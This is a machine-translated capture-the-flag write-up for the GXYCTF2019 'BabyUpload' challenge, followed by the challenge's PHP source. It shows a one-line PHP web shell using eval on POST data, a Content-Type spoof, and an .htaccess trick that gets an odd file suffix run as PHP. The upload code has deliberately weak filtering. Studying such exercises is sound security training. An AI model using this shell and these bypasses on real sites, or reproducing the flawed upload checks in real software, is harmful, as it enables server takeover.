[GXYCTF2019]BabyUpload

[GXYCTF2019]BabyUpload

Open range address , The idea of uploading test files is still very important .

First upload a php File check , This is a high probability that you can't upload , Then grab the bag and follow the train of thought .

The restriction suffix cannot contain **ph ,** It may be a blacklist , Under the test of random characters .

Prompt upload type also limits , No problem , Modify the Content-Type Field value MIME type .

Unexpectedly, this question not only sets the blacklist limit ( The suffix cannot contain ph) There are white list restrictions ( Upload type is image/jpeg) . Prompt that the sign is php Description the contents of the document are checked . In this case, you can still bypass .

##  In a word, Trojans 
<script language='php'>eval($_POST[cmd]);</script>

Successfully uploaded , But there's another problem , The uploaded file is .123123 Is a non-existent suffix , Unable to resolve . But visit /upload When I found the directory 403 error . The version of the range middleware is Apache That's easy .

Apache User profiles in .htaccess No, ph Keywords can also be uploaded , Just set... In the configuration .123123 Can be php Just parse it .

use Ant sword connects with Trojan horse ( The Trojan horse used above is to receive GET The requested cannot be used , The back is changed to POST).

find flag 了 .

Source code

<?php
session_start();
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>Upload</title> <form action=\"\" method=\"post\" enctype=\"multipart/form-data\">  Upload files <input type=\"file\" name=\"uploaded\" /> <input type=\"submit\" name=\"submit\" value=\" Upload \" /> </form>";
error_reporting(0);
if(!isset($_SESSION['user'])){
    
    $_SESSION['user'] = md5((string)time() . (string)rand(100, 1000));
}
if(isset($_FILES['uploaded'])) {
    
    $target_path  = getcwd() . "/upload/" . md5($_SESSION['user']); 
	  //  File upload directory 
    $t_path = $target_path . "/" . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_ext  = substr($uploaded_name, strrpos($uploaded_name,'.') + 1);
	  //  File suffix 
    $uploaded_size = $_FILES['uploaded']['size'];
	  //  file size 
    $uploaded_tmp  = $_FILES['uploaded']['tmp_name'];
 
    if(preg_match("/ph/i", strtolower($uploaded_ext))){
    
        die(" The suffix cannot have ph！");
    }
    else{
    
        if ((($_FILES["uploaded"]["type"] == " ") || ($_FILES["uploaded"]["type"] == "image/jpeg") || ($_FILES["uploaded"]["type"] == "image/pjpeg")) && ($_FILES["uploaded"]["size"] < 2048)){
    
					//  Limit file size 、 file type (jpeg and pjpeg)
            $content = file_get_contents($uploaded_tmp);
					//  Get the contents of the file 
            if(preg_match("/\<\?/i", $content)){
    
							//  Match the contents of the file, if any  <?  Just report a mistake 
                die(" EH , Don't deceive me , This sign is still obvious php ah ");
            }
            else{
    
                mkdir(iconv("UTF-8", "GBK", $target_path), 0777, true);
                move_uploaded_file($uploaded_tmp, $t_path);
                echo "{
      $t_path} succesfully uploaded!";
            }
        }
        else{
    
            die(" The upload type is too explicit ！");
        }
    }
}
?>